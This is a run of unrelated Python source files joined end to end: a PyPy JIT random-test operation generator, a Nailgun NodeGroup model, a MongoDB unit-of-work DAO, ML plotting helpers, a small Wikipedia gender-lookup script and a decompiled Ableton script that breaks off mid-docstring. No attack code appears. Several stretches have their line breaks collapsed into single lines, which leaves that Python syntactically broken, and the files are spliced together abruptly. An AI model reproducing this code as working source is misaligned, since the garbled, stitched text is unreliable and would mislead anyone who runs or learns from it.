        builder.do(self.opnum, [v, v_index, w], descr)

class NewOperation(test_random.AbstractOperation):
    """Produce NEW or NEW_WITH_VTABLE and register the result pointer."""
    def size_descr(self, builder, S, *vtable):
        descr = builder.cpu.sizeof(S, *vtable)
        descr._random_info = 'cpu.sizeof(...)'
        descr._random_type = S
        return descr

    def produce_into(self, builder, r):
        if self.opnum == rop.NEW_WITH_VTABLE:
            S, vtable = builder.get_random_structure_type_and_vtable(r)
            descr = self.size_descr(builder, S, vtable)
        else:
            S = builder.get_random_structure_type(r)
            descr = self.size_descr(builder, S)
        v_ptr = builder.do(self.opnum, [], descr)
        builder.ptrvars.append((v_ptr, S))

class ArrayOperation(test_random.AbstractOperation):
    """Shared helper: build an array descr annotated for reproduction."""
    def array_descr(self, builder, A):
        descr = builder.cpu.arraydescrof(A)
        descr._random_info = 'cpu.arraydescrof(...)'
        descr._random_type = A
        return descr

class GetArrayItemOperation(ArrayOperation):
    def field_descr(self, builder, r):
        v, A = builder.get_arrayptr_var(r)
        array = getref(lltype.Ptr(A), v)
        v_index = builder.get_index(len(array), r)
        descr = self.array_descr(builder, A)
        return v, A, v_index, descr

    def produce_into(self, builder, r):
        while True:
            try:
                v, _, v_index, descr = self.field_descr(builder, r)
                self.put(builder, [v, v_index], descr)
            except lltype.UninitializedMemoryAccess:
                continue
            break

class SetArrayItemOperation(GetArrayItemOperation):
    def produce_into(self, builder, r):
        v, A, v_index, descr = self.field_descr(builder, r)
        # Same round-trip constraint as SetFieldOperation, per item type.
        while True:
            if r.random() < 0.3:
                w = ConstInt(r.random_integer())
            else:
                w = r.choice(builder.intvars)
            value = getint(w)
            if rffi.cast(lltype.Signed, rffi.cast(A.OF, value)) == value:
                break
        builder.do(self.opnum, [v, v_index, w], descr)

class NewArrayOperation(ArrayOperation):
    def produce_into(self, builder, r):
        A = builder.get_random_array_type(r, can_be_array_of_struct=True)
        v_size = builder.get_index(300, r)
        v_ptr = builder.do(self.opnum, [v_size], self.array_descr(builder, A))
        builder.ptrvars.append((v_ptr, A))

class ArrayLenOperation(ArrayOperation):
    def produce_into(self, builder, r):
        v, A = builder.get_arrayptr_var(r)
        descr = self.array_descr(builder, A)
        self.put(builder, [v], descr)

class _UnicodeOperation:
    # Mixin: parameters for operating on rstr.UNICODE strings.
    builder_cache = "runicodes"
    struct = rstr.UNICODE
    ptr = lltype.Ptr(struct)
    alloc = staticmethod(rstr.mallocunicode)
    # XXX This should really be runicode.MAXUNICODE, but then
    # lltype.cast_primitive complains.
    max = py.std.sys.maxunicode
    primitive = lltype.UniChar
    set_char = rop.UNICODESETITEM

class _StrOperation:
    # Mixin: parameters for operating on rstr.STR byte strings.
    builder_cache = "rstrs"
    struct = rstr.STR
    ptr = lltype.Ptr(struct)
    alloc = staticmethod(rstr.mallocstr)
    max = 255
    primitive = lltype.Char
    set_char = rop.STRSETITEM

class NewSeqOperation(test_random.AbstractOperation):
    """Produce NEWSTR/NEWUNICODE and fill it with random characters."""
    def produce_into(self, builder, r):
        v_length = builder.get_index(10, r)
        v_ptr = builder.do(self.opnum, [v_length])
        getattr(builder, self.builder_cache).append(v_ptr)
        # Initialize the string. Is there a better way to do this?
        for i in range(getint(v_length)):
            v_index = ConstInt(i)
            v_char = ConstInt(r.random_integer() % self.max)
            builder.do(self.set_char, [v_ptr, v_index, v_char])

class NewStrOperation(NewSeqOperation, _StrOperation):
    pass

class NewUnicodeOperation(NewSeqOperation, _UnicodeOperation):
    pass

class AbstractStringOperation(test_random.AbstractOperation):
    def get_string(self, builder, r):
        # Reuse a cached string 80% of the time, otherwise allocate a
        # new one; in both cases re-randomize its character content.
        current = getattr(builder, self.builder_cache)
        if current and r.random() < .8:
            v_string = r.choice(current)
            string = getref(self.ptr, v_string)
        else:
            string = self.alloc(getint(builder.get_index(500, r)))
            v_string = ConstPtr(lltype.cast_opaque_ptr(llmemory.GCREF, string))
            current.append(v_string)
        for i in range(len(string.chars)):
            char = r.random_integer() % self.max
            string.chars[i] = lltype.cast_primitive(self.primitive, char)
        return v_string

class AbstractGetItemOperation(AbstractStringOperation):
    def produce_into(self, builder, r):
        v_string = self.get_string(builder, r)
        v_index = builder.get_index(len(getref(self.ptr, v_string).chars), r)
        builder.do(self.opnum, [v_string, v_index])

class AbstractSetItemOperation(AbstractStringOperation):
    def produce_into(self, builder, r):
        v_string = self.get_string(builder, r)
        if isinstance(v_string, ConstPtr):
            raise test_random.CannotProduceOperation  # setitem(Const, ...)
        v_index = builder.get_index(len(getref(self.ptr, v_string).chars), r)
        v_target = ConstInt(r.random_integer() % self.max)
        builder.do(self.opnum, [v_string, v_index, v_target])

class AbstractStringLenOperation(AbstractStringOperation):
    def produce_into(self, builder, r):
        v_string = self.get_string(builder, r)
        builder.do(self.opnum, [v_string])

class AbstractCopyContentOperation(AbstractStringOperation):
    def produce_into(self, builder, r):
        v_srcstring = self.get_string(builder, r)
        v_dststring = self.get_string(builder, r)
        src = getref(self.ptr, v_srcstring)
        dst = getref(self.ptr, v_dststring)
        if src == dst:                                # because it's not a
            raise test_random.CannotProduceOperation  # memmove(), but memcpy()
        srclen = len(src.chars)
        dstlen = len(dst.chars)
        # Choose start offsets so that start + length stays in bounds.
        v_length = builder.get_index(min(srclen, dstlen), r)
        v_srcstart = builder.get_index(srclen - getint(v_length) + 1, r)
        v_dststart = builder.get_index(dstlen - getint(v_length) + 1, r)
        builder.do(self.opnum, [v_srcstring, v_dststring,
                                v_srcstart, v_dststart, v_length])

class StrGetItemOperation(AbstractGetItemOperation, _StrOperation):
    pass

class UnicodeGetItemOperation(AbstractGetItemOperation, _UnicodeOperation):
    pass

class StrSetItemOperation(AbstractSetItemOperation, _StrOperation):
    pass

class UnicodeSetItemOperation(AbstractSetItemOperation, _UnicodeOperation):
    pass

class StrLenOperation(AbstractStringLenOperation, _StrOperation):
    pass

class UnicodeLenOperation(AbstractStringLenOperation, _UnicodeOperation):
    pass

class CopyStrContentOperation(AbstractCopyContentOperation, _StrOperation):
    pass

class CopyUnicodeContentOperation(AbstractCopyContentOperation,
                                  _UnicodeOperation):
    pass

# there are five options in total:
# 1. non raising call and guard_no_exception
# 2. raising call and guard_exception
# 3. raising call and wrong guard_exception
# 4.
# raising call and guard_no_exception
# 5. non raising call and guard_exception
# (6. test of a cond_call, always non-raising and guard_no_exception)

class BaseCallOperation(test_random.AbstractOperation):
    """Common machinery for producing CALL_* operations: dynamically
    compiles small helper functions (raising or not) to be called."""

    def non_raising_func_code(self, builder, r):
        # Build f(arg_0, ..., arg_n) returning intmask(sum(args) + 42),
        # as an int, float or nothing depending on the CALL_* variant.
        subset = builder.subset_of_intvars(r)
        funcargs = ", ".join(['arg_%d' % i for i in range(len(subset))])
        sum = "intmask(%s)" % " + ".join(
            ['arg_%d' % i for i in range(len(subset))] + ['42'])
        if self.opnum == rop.CALL_I:
            result = 'sum'
        elif self.opnum == rop.CALL_F:
            result = 'float(sum)'
        elif self.opnum == rop.CALL_N:
            result = ''
        else:
            raise AssertionError(self.opnum)
        code = py.code.Source("""
        def f(%s):
            sum = %s
            return %s
        """ % (funcargs, sum, result)).compile()
        d = {'intmask': intmask}
        exec(code, d)
        return subset, d['f']

    def raising_func_code(self, builder, r):
        # Build f(...) that unconditionally raises an LLException with a
        # random vtable; returns (args_subset, f, vtable) so callers can
        # guard on exactly that exception.
        # NOTE(review): get_structptr_var returns (var, TYPE); the names
        # S and v are swapped here relative to that, but the uses below
        # are consistent with the actual values.
        subset = builder.subset_of_intvars(r)
        funcargs = ", ".join(['arg_%d' % i for i in range(len(subset))])
        S, v = builder.get_structptr_var(r, must_have_vtable=True)
        code = py.code.Source("""
        def f(%s):
            raise LLException(vtable, ptr)
        """ % funcargs).compile()
        vtableptr = v._hints['vtable']._as_ptr()
        d = {
            'ptr': getref_base(S),
            'vtable': vtableptr,
            'LLException': LLException,
        }
        exec(code, d)
        return subset, d['f'], vtableptr

    def getresulttype(self):
        # Map the operation number to the lltype of the call's result.
        if self.opnum == rop.CALL_I or self.opnum == rop.COND_CALL_VALUE_I:
            return lltype.Signed
        elif self.opnum == rop.CALL_F:
            return lltype.Float
        elif self.opnum == rop.CALL_N or self.opnum == rop.COND_CALL:
            return lltype.Void
        else:
            raise AssertionError(self.opnum)

    def getcalldescr(self, builder, TP):
        assert TP.RESULT == self.getresulttype()
        ef = EffectInfo.MOST_GENERAL
        return builder.cpu.calldescrof(TP, TP.ARGS, TP.RESULT, ef)

# 1.
# non raising call and guard_no_exception
class CallOperation(BaseCallOperation):
    """Case 1: non-raising call followed by GUARD_NO_EXCEPTION (passes)."""
    def produce_into(self, builder, r):
        fail_subset = builder.subset_of_intvars(r)
        subset, f = self.non_raising_func_code(builder, r)
        RES = self.getresulttype()
        TP = lltype.FuncType([lltype.Signed] * len(subset), RES)
        ptr = llhelper(lltype.Ptr(TP), f)
        c_addr = ConstInt(ptr2int(ptr))
        args = [c_addr] + subset
        descr = self.getcalldescr(builder, TP)
        self.put(builder, args, descr)
        op = ResOperation(rop.GUARD_NO_EXCEPTION, [],
                          descr=builder.getfaildescr())
        op.setfailargs(fail_subset)
        builder.loop.operations.append(op)

# 5. Non raising-call and GUARD_EXCEPTION
class CallOperationException(BaseCallOperation):
    """Case 5: non-raising call but a GUARD_EXCEPTION, which must fail."""
    def produce_into(self, builder, r):
        subset, f = self.non_raising_func_code(builder, r)
        RES = self.getresulttype()
        TP = lltype.FuncType([lltype.Signed] * len(subset), RES)
        ptr = llhelper(lltype.Ptr(TP), f)
        c_addr = ConstInt(ptr2int(ptr))
        args = [c_addr] + subset
        descr = self.getcalldescr(builder, TP)
        self.put(builder, args, descr)
        _, vtableptr = builder.get_random_structure_type_and_vtable(r)
        exc_box = ConstInt(ptr2int(vtableptr))
        op = ResOperation(rop.GUARD_EXCEPTION, [exc_box],
                          descr=builder.getfaildescr())
        op.setfailargs(builder.subset_of_intvars(r))
        op._exc_box = None
        # the guard fails (no exception was set), ending the loop here
        builder.should_fail_by = op
        builder.guard_op = op
        builder.loop.operations.append(op)

# 2. raising call and guard_exception
class RaisingCallOperation(BaseCallOperation):
    """Case 2: raising call guarded by the matching GUARD_EXCEPTION
    (the guard passes)."""
    def produce_into(self, builder, r):
        fail_subset = builder.subset_of_intvars(r)
        subset, f, exc = self.raising_func_code(builder, r)
        TP = lltype.FuncType([lltype.Signed] * len(subset), lltype.Void)
        ptr = llhelper(lltype.Ptr(TP), f)
        c_addr = ConstInt(ptr2int(ptr))
        args = [c_addr] + subset
        descr = self.getcalldescr(builder, TP)
        self.put(builder, args, descr)
        exc_box = ConstInt(ptr2int(exc))
        op = ResOperation(rop.GUARD_EXCEPTION, [exc_box],
                          descr=builder.getfaildescr())
        op.setfailargs(fail_subset)
        builder.loop.operations.append(op)

# 4.
# raising call and guard_no_exception
class RaisingCallOperationGuardNoException(BaseCallOperation):
    """Case 4: raising call with GUARD_NO_EXCEPTION, which must fail."""
    def produce_into(self, builder, r):
        subset, f, exc = self.raising_func_code(builder, r)
        TP = lltype.FuncType([lltype.Signed] * len(subset), lltype.Void)
        ptr = llhelper(lltype.Ptr(TP), f)
        c_addr = ConstInt(ptr2int(ptr))
        args = [c_addr] + subset
        descr = self.getcalldescr(builder, TP)
        self.put(builder, args, descr)
        op = ResOperation(rop.GUARD_NO_EXCEPTION, [],
                          descr=builder.getfaildescr())
        # remember the exception the test harness should observe
        op._exc_box = ConstInt(ptr2int(exc))
        op.setfailargs(builder.subset_of_intvars(r))
        builder.should_fail_by = op
        builder.guard_op = op
        builder.loop.operations.append(op)

# 3. raising call and wrong guard_exception
class RaisingCallOperationWrongGuardException(BaseCallOperation):
    """Case 3: raising call guarded by GUARD_EXCEPTION on a *different*
    vtable, so the guard must fail."""
    def produce_into(self, builder, r):
        subset, f, exc = self.raising_func_code(builder, r)
        TP = lltype.FuncType([lltype.Signed] * len(subset), lltype.Void)
        ptr = llhelper(lltype.Ptr(TP), f)
        c_addr = ConstInt(ptr2int(ptr))
        args = [c_addr] + subset
        descr = self.getcalldescr(builder, TP)
        self.put(builder, args, descr)
        # pick any vtable that is not the one actually raised
        while True:
            _, vtableptr = builder.get_random_structure_type_and_vtable(r)
            if vtableptr != exc:
                break
        other_box = ConstInt(ptr2int(vtableptr))
        op = ResOperation(rop.GUARD_EXCEPTION, [other_box],
                          descr=builder.getfaildescr())
        op._exc_box = ConstInt(ptr2int(exc))
        op.setfailargs(builder.subset_of_intvars(r))
        builder.should_fail_by = op
        builder.guard_op = op
        builder.loop.operations.append(op)

# 6.
a conditional call (for now always with no exception raised) class CondCallOperation(BaseCallOperation): def produce_into(self, builder, r): fail_subset = builder.subset_of_intvars(r) if self.opnum == rop.COND_CALL: RESULT_TYPE = lltype.Void v_cond = builder.get_bool_var(r) else: RESULT_TYPE = lltype.Signed v_cond = r.choice(builder.intvars) subset = builder.subset_of_intvars(r)[:4] for i in range(len(subset)): if r.random() < 0.35: subset[i] = ConstInt(r.random_integer()) # seen = [] def call_me(*args): if len(seen) == 0: seen.append(args) else: assert seen[0] == args if RESULT_TYPE is lltype.Signed: return len(args) - 42000 # TP = lltype.FuncType([lltype.Signed] * len(subset), RESULT_TYPE) ptr = llhelper(lltype.Ptr(TP), call_me) c_addr = ConstInt(ptr2int(ptr)) args = [v_cond, c_addr] + subset descr = self.getcalldescr(builder, TP) self.put(builder, args, descr) op = ResOperation(rop.GUARD_NO_EXCEPTION, [], descr=builder.getfaildescr()) op.setfailargs(fail_subset) builder.loop.operations.append(op) # ____________________________________________________________ OPERATIONS = test_random.OPERATIONS[:] for i in range(4): # make more common OPERATIONS.append(GetFieldOperation(rop.GETFIELD_GC_I)) OPERATIONS.append(GetFieldOperation(rop.GETFIELD_GC_I)) OPERATIONS.append(GetInteriorFieldOperation(rop.GETINTERIORFIELD_GC_I)) OPERATIONS.append(GetInteriorFieldOperation(rop.GETINTERIORFIELD_GC_I)) OPERATIONS.append(SetFieldOperation(rop.SETFIELD_GC)) OPERATIONS.append(SetInteriorFieldOperation(rop.SETINTERIORFIELD_GC)) OPERATIONS.append(NewOperation(rop.NEW)) OPERATIONS.append(NewOperation(rop.NEW_WITH_VTABLE)) OPERATIONS.append(GetArrayItemOperation(rop.GETARRAYITEM_GC_I)) OPERATIONS.append(GetArrayItemOperation(rop.GETARRAYITEM_GC_I)) OPERATIONS.append(SetArrayItemOperation(rop.SETARRAYITEM_GC)) OPERATIONS.append(NewArrayOperation(rop.NEW_ARRAY_CLEAR)) OPERATIONS.append(ArrayLenOperation(rop.ARRAYLEN_GC)) OPERATIONS.append(NewStrOperation(rop.NEWSTR)) 
OPERATIONS.append(NewUnicodeOperation(rop.NEWUNICODE)) OPERATIONS.append(StrGetItemOperation(rop.STRGETITEM)) OPERATIONS.append(UnicodeGetItemOperation(rop.UNICODEGETITEM)) OPERATIONS.append(StrSetItemOperation(rop.STRSETITEM)) OPERATIONS.append(UnicodeSetItemOperation(rop.UNICODESETITEM)) OPERATIONS.append(StrLenOperation(rop.STRLEN)) OPERATIONS.append(UnicodeLenOperation(rop.UNICODELEN)) OPERATIONS.append(CopyStrContentOperation(rop.COPYSTRCONTENT)) OPERATIONS.append(CopyUnicodeContentOperation(rop.COPYUNICODECONTENT)) for i in range(2): OPERATIONS.append(GuardClassOperation(rop.GUARD_CLASS)) OPERATIONS.append(CondCallOperation(rop.COND_CALL)) OPERATIONS.append(CondCallOperation(rop.COND_CALL_VALUE_I)) OPERATIONS.append(RaisingCallOperation(rop.CALL_N)) OPERATIONS.append(RaisingCallOperationGuardNoException(rop.CALL_N)) OPERATIONS.append(RaisingCallOperationWrongGuardException(rop.CALL_N)) OPERATIONS.append(GuardNonNullClassOperation(rop.GUARD_NONNULL_CLASS)) for _opnum in [rop.CALL_I, rop.CALL_F, rop.CALL_N]: OPERATIONS.append(CallOperation(_opnum)) OPERATIONS.append(CallOperationException(_opnum)) LLtypeOperationBuilder.OPERATIONS = OPERATIONS # ____________________________________________________________ def test_ll_random_function(): test_random.test_random_function(LLtypeOperationBuilder)
# -*- coding: utf-8 -*- # Copyright 2014 Mirantis, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from nailgun.objects.serializers.node_group import NodeGroupSerializer from nailgun.db import db from nailgun.db.sqlalchemy.models import NodeGroup as DBNodeGroup from nailgun.errors import errors from nailgun.objects import Cluster from nailgun.objects import NailgunCollection from nailgun.objects import NailgunObject class NodeGroup(NailgunObject): model = DBNodeGroup serializer = NodeGroupSerializer schema = { "$schema": "http://json-schema.org/draft-04/schema#", "title": "NodeGroup", "description": "Serialized NodeGroup object", "type": "object", "properties": { "id": {"type": "number"}, "cluster_id": {"type": "number"}, "name": {"type": "string"} } } @classmethod def create(cls, data): new_group = super(NodeGroup, cls).create(data) try: cluster = Cluster.get_by_uid(new_group.cluster_id) nm = Cluster.get_network_manager(cluster) nst = cluster.network_config.segmentation_type nm.create_network_groups(cluster, nst, gid=new_group.id) nm.create_admin_network_group(new_group.cluster_id, new_group.id) except ( errors.OutOfVLANs, errors.OutOfIPs, errors.NoSuitableCIDR, errors.InvalidNetworkPool ) as exc: db().delete(new_group) raise errors.CannotCreate(exc.message) db().flush() return new_group class NodeGroupCollection(NailgunCollection): single = NodeGroup @classmethod def get_by_cluster_id(cls, cluster_id): if not cluster_id: return cls.filter_by(None, cluster_id=None) return 
cls.filter_by(None, cluster_id=cluster_id)
import json data = json.dumps({'status': {'recordsTotal': 0, 'request': 'getSalesReport', 'generationTime': 0.13462495803833, 'recordsInResponse': 0, 'requestUnixTime': 1469040297, 'errorCode': 1016, 'errorField': 'dateStart', 'responseStatus': 'error'}, 'records': None})
import mwclient site = mwclient.Site('en.wikipedia.org') def get_gender(users): result = {} users = site.users(users=users, prop=['gender']) for user in users: name = user['name'] if 'missing' in user: result[name] = 'unknown' else: gender = user['gender'] result[name] = gender return result # def get_talk_page(page_id): r = site.pages.get(name='John Monteath Robertson') print(r) # print(get_gender(users=['NRuiz', 'Deacon Vorbis', 'Rick Norwood']))
__author__ = 'Bohdan Mushkevych'

from threading import RLock
from bson.objectid import ObjectId
from pymongo import ASCENDING
from pymongo.errors import DuplicateKeyError as MongoDuplicateKeyError

from synergy.system import time_helper
from synergy.system.time_qualifier import *
from synergy.system.decorator import thread_safe
from synergy.scheduler.scheduler_constants import COLLECTION_UNIT_OF_WORK, TYPE_MANAGED
from synergy.conf import context
from synergy.db.error import DuplicateKeyError
from synergy.db.model import unit_of_work
from synergy.db.model.unit_of_work import UnitOfWork
from synergy.db.manager import ds_manager

# Builds a Mongo query for freerun units of work at/after *timeperiod*.
# NOTE(review): when unprocessed_only is False this becomes
# {STATE: {'$ne': None}}, i.e. it still filters out documents whose state
# is literally None rather than applying no state filter — confirm intent.
QUERY_GET_FREERUN_SINCE = lambda timeperiod, unprocessed_only: {
    unit_of_work.TIMEPERIOD: {'$gte': timeperiod},
    unit_of_work.UNIT_OF_WORK_TYPE: unit_of_work.TYPE_FREERUN,
    unit_of_work.STATE: {'$ne': unit_of_work.STATE_PROCESSED if unprocessed_only else None}
}


class UnitOfWorkDao(object):
    """ Thread-safe Data Access Object from units_of_work table/collection

    All public methods are guarded by ``self.lock`` via @thread_safe.
    NOTE(review): ``collection.save/insert/remove(..., safe=True)`` below is
    PyMongo 2.x API — these calls were removed in PyMongo 3; confirm the
    pinned driver version before upgrading.
    """

    def __init__(self, logger):
        super(UnitOfWorkDao, self).__init__()
        self.logger = logger
        self.lock = RLock()
        self.ds = ds_manager.ds_factory(logger)

    @thread_safe
    def get_one(self, key):
        """ method finds unit_of_work record and returns it to the caller

        :param key: document _id, as an ObjectId or its string form
        :raises LookupError: if no matching document exists
        """
        if not isinstance(key, ObjectId):
            # cast key to ObjectId
            key = ObjectId(key)

        query = {'_id': key}
        collection = self.ds.connection(COLLECTION_UNIT_OF_WORK)

        document = collection.find_one(query)
        if document is None:
            msg = 'Unit_of_work with ID=%s was not found' % str(key)
            self.logger.warn(msg)
            raise LookupError(msg)
        return UnitOfWork.from_json(document)

    @thread_safe
    def get_reprocessing_candidates(self, since=None):
        """ method queries Unit Of Work whose <start_timeperiod> is younger than <since>
        and who could be candidates for re-processing

        Candidates are managed units in IN_PROGRESS/INVALID/REQUESTED state.
        :raises LookupError: when no candidates are found
        """
        collection = self.ds.connection(COLLECTION_UNIT_OF_WORK)

        query = {unit_of_work.STATE: {'$in': [unit_of_work.STATE_IN_PROGRESS,
                                              unit_of_work.STATE_INVALID,
                                              unit_of_work.STATE_REQUESTED]},
                 unit_of_work.UNIT_OF_WORK_TYPE: TYPE_MANAGED}

        if since is None:
            # No time bound: every matching document is a candidate.
            cursor = collection.find(query).sort('_id', ASCENDING)
            candidates = [UnitOfWork.from_json(document) for document in cursor]
        else:
            candidates = []
            # Coarse pre-filter at yearly granularity, refined per process
            # below with that process's own time qualifier.
            yearly_timeperiod = time_helper.cast_to_time_qualifier(QUALIFIER_YEARLY, since)
            query[unit_of_work.START_TIMEPERIOD] = {'$gte': yearly_timeperiod}

            cursor = collection.find(query).sort('_id', ASCENDING)
            for document in cursor:
                uow = UnitOfWork.from_json(document)
                if uow.process_name not in context.process_context:
                    # this is a decommissioned process
                    continue

                time_qualifier = context.process_context[uow.process_name].time_qualifier
                if time_qualifier == QUALIFIER_REAL_TIME:
                    # Real-time processes are compared at hourly granularity.
                    time_qualifier = QUALIFIER_HOURLY
                process_specific_since = time_helper.cast_to_time_qualifier(time_qualifier, since)

                if process_specific_since <= uow.start_timeperiod:
                    candidates.append(uow)

        if len(candidates) == 0:
            raise LookupError('MongoDB has no reprocessing candidates units of work')
        return candidates

    @thread_safe
    def get_by_params(self, process_name, timeperiod, start_obj_id, end_obj_id):
        """ method finds unit_of_work record and returns it to the caller

        Lookup is by the logical primary key (process, timeperiod, id range).
        :raises LookupError: if no matching document exists
        """
        query = {unit_of_work.PROCESS_NAME: process_name,
                 unit_of_work.TIMEPERIOD: timeperiod,
                 unit_of_work.START_OBJ_ID: start_obj_id,
                 unit_of_work.END_OBJ_ID: end_obj_id}
        collection = self.ds.connection(COLLECTION_UNIT_OF_WORK)

        document = collection.find_one(query)
        if document is None:
            raise LookupError('Unit_of_work satisfying query %r was not found' % query)
        return UnitOfWork.from_json(document)

    @thread_safe
    def update(self, instance):
        """ method finds unit_of_work record and change its status

        Upserts the document; returns the document's _id.
        """
        assert isinstance(instance, UnitOfWork)
        collection = self.ds.connection(COLLECTION_UNIT_OF_WORK)
        document = instance.document
        if instance.db_id:
            document['_id'] = ObjectId(instance.db_id)
        instance.db_id = collection.save(document, safe=True)
        return instance.db_id

    @thread_safe
    def insert(self, instance):
        """ inserts a unit of work into MongoDB.

        :raises DuplicateKeyError: if such record already exist """
        assert isinstance(instance, UnitOfWork)
        collection = self.ds.connection(COLLECTION_UNIT_OF_WORK)
        try:
            return collection.insert(instance.document, safe=True)
        except MongoDuplicateKeyError as e:
            # Re-wrap the driver error, preserving the logical key.
            exc = DuplicateKeyError(instance.process_name,
                                    instance.start_timeperiod,
                                    instance.start_id,
                                    instance.end_id,
                                    e)
            raise exc

    @thread_safe
    def remove(self, uow_id):
        """Delete the unit of work with the given _id."""
        assert isinstance(uow_id, (str, ObjectId))
        collection = self.ds.connection(COLLECTION_UNIT_OF_WORK)
        return collection.remove(uow_id, safe=True)

    @thread_safe
    def run_query(self, query):
        """ method runs the query and returns a list of filtered UnitOfWork records """
        cursor = self.ds.filter(COLLECTION_UNIT_OF_WORK, query)
        return [UnitOfWork.from_json(document) for document in cursor]

    def recover_from_duplicatekeyerror(self, e):
        """ method tries to recover from DuplicateKeyError

        Returns the already-existing UnitOfWork when it can be located;
        otherwise logs the failure and returns None.
        NOTE(review): ``e.message`` is Python-2-only.
        """
        if isinstance(e, DuplicateKeyError):
            try:
                return self.get_by_params(e.process_name, e.timeperiod, e.start_id, e.end_id)
            except LookupError as e:
                self.logger.error('Unable to recover from DuplicateKeyError error due to %s' % e.message,
                                  exc_info=True)
        else:
            msg = 'Unable to recover from DuplicateKeyError due to unspecified unit_of_work primary key'
            self.logger.error(msg)
import math
from math import sqrt
from os import listdir
from os.path import join, basename

import matplotlib.pyplot as plt
import moviepy.editor as mpy
import numpy as np
from torch import nn

from src.Common import config
from src.Common.utils import get_data_base


def loss_visualization(training_space: dict, loss_history: dict, i_epoch: int, max_ticks: int = 15) -> None:
    """Plot raw/train/validation loss curves and save the figure as a PNG.

    :param training_space: paths/labels of the run; uses 'loss' (output dir)
        and 'mark' (filename prefix)
    :param loss_history: dict with per-step 'loss' and per-epoch
        'valid_loss' / 'avg_loss' lists
    :param i_epoch: number of completed epochs (x-axis labels are 1..i_epoch)
    :param max_ticks: maximum number of x-axis ticks to render
    """
    loss_history_len = len(loss_history['loss'])
    # Approximate number of recorded steps per epoch.
    per_epoch = loss_history_len // i_epoch - 1
    x_ticks = np.arange(0, loss_history_len - per_epoch, per_epoch + 1)
    x_labels = np.array([str(ep) for ep in np.arange(1, i_epoch + 1)])

    fig, ax = plt.subplots(figsize=(19.2, 10.8))
    # Raw per-step loss, trimmed at both ends to skip the warm-up spike.
    ax.plot(np.arange(loss_history_len - per_epoch)[per_epoch:],
            loss_history['loss'][per_epoch:-per_epoch], color='lavender')
    ax.plot(x_ticks, loss_history['valid_loss'], label='Validation loss', color='springgreen')
    ax.plot(x_ticks, loss_history['avg_loss'], label='Train loss', color='royalblue')

    if len(x_ticks) > max_ticks:
        # Bug fix: the sub-sampling previously hard-coded num=15, ignoring
        # the max_ticks parameter.
        mask = np.linspace(start=0, stop=len(x_ticks) - 1, num=max_ticks, dtype=np.int32)
        x_ticks = x_ticks[mask]
        x_labels = x_labels[mask]

    ax.set_title('Loss changing')
    ax.set_ylabel('Loss')
    ax.set_xlabel('Epoch')
    ax.set_xticks(x_ticks)
    ax.set_xticklabels(x_labels)
    ax.set_ybound(lower=0)
    ax.legend()
    fig.tight_layout()

    plt.savefig(join(training_space['loss'], f'{training_space["mark"]}__epoch_{i_epoch}.png'),
                dpi='figure', format='png', bbox_inches='tight')
    plt.clf()
    plt.close('all')


def save_parameters(model: nn.Module, training_space: dict, i_epoch: int) -> None:
    """Persist model parameters for the given epoch under the run's
    'parameters' directory."""
    model.save_parameters(filename=join(training_space['parameters'],
                                        f'{training_space["mark"]}__epoch_{i_epoch}'))


def array_to_image(array: np.ndarray) -> np.ndarray:
    """Normalize a flat array into a square uint8 grayscale image.

    Values are standardized, squeezed around 0.5 and mapped to [0, 255];
    the array is zero-padded up to the next perfect square.

    :param array: any-shaped numeric array (flattened internally)
    :returns: (k, k) uint8 array with k = ceil(sqrt(array.size))
    """
    array = array.reshape(-1)
    array_size = len(array)
    image_size = math.ceil(sqrt(array_size))
    image = np.zeros(image_size * image_size)
    image[:array_size] = array

    # use custom params for other color scheme
    image -= image.mean()
    image /= (image.std() + 1e-5)
    image *= 0.1            # compress contrast around the mean
    image += 0.5            # center on mid-gray
    image = np.clip(image, 0, 1)
    # After clipping to [0, 1] the scaled values are already within
    # [0, 255], so a single conversion suffices.
    image = (image * 255).astype('uint8')

    return image.reshape((image_size, image_size))


def create_image(array: np.ndarray, name: str) -> None:
    """Render *array* with matplotlib and save it as '<name>.png' in the
    configured visualization directory."""
    plt.figure(figsize=(20, 20))
    plt.tight_layout()
    plt.imshow(array)
    plt.savefig(join(config.visualization_path, f'{name}.png'),
                dpi=600, format='png', bbox_inches='tight')
    plt.clf()
    plt.close('all')


def create_gif(images_path: str, gif_name: str = 'latent_space', fps: int = 8) -> None:
    """Assemble all images in *images_path* into an animated GIF.

    Frames are ordered by the integer embedded in the file name; names are
    assumed to look like '<mark>__epoch_<N>.png' (third '_'-separated part
    holds the number).
    """
    def by_len(s: str):
        # Extract the epoch number from the file name for sorting.
        s = basename(s)
        s = s.split('_')[2]
        s = s.split('.')[0]
        return int(s)

    file_list = [join(images_path, file_name) for file_name in listdir(images_path)]
    file_list = sorted(file_list, key=by_len)

    clip = mpy.ImageSequenceClip(file_list, fps=fps)
    clip.write_gif(join(images_path, f'{gif_name}.gif'), fps=fps)


if __name__ == '__main__':
    data_base = get_data_base('database.csv', labels=False)
    arr = array_to_image(data_base.loc[0].copy().to_numpy())
    create_image(arr, name='image_0')
    pass
# uncompyle6 version 3.3.5
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.7.3 (default, Apr 24 2019, 15:29:51) [MSC v.1915 64 bit (AMD64)]
# Embedded file name: c:\Jenkins\live\output\win_64_static\Release\python-bundle\MIDI Remote Scripts\pushbase\value_component.py
# Compiled at: 2018-11-30 15:48:12
from __future__ import absolute_import, print_function, unicode_literals
from ableton.v2.base import listenable_property, listens
from ableton.v2.control_surface import Component, ParameterSlot
from ableton.v2.control_surface.control import EncoderControl, ButtonControl
from ableton.v2.control_surface.elements import DisplayDataSource
from . import consts
from .device_parameter_component import convert_parameter_value_to_graphic

# Number of display segments a value component occupies.
NUM_SEGMENTS = 4

def convert_value_to_graphic(value):
    """Map a [0..1] value to one of the GRAPH_VOL bar characters; out-of-range
    indices fall back to a blank."""
    index = int(value * (len(consts.GRAPH_VOL) - 1))
    # NOTE(review): ``index`` is always an int here, so the ``is not None``
    # part of this check is dead (decompiler artifact?).
    if index is not None and index < len(consts.GRAPH_VOL):
        graphic_display_string = consts.GRAPH_VOL[index]
    else:
        graphic_display_string = b' '
    return graphic_display_string


class ValueDisplayComponentBase(Component):
    """Base display component: owns label / value / graphic data sources and
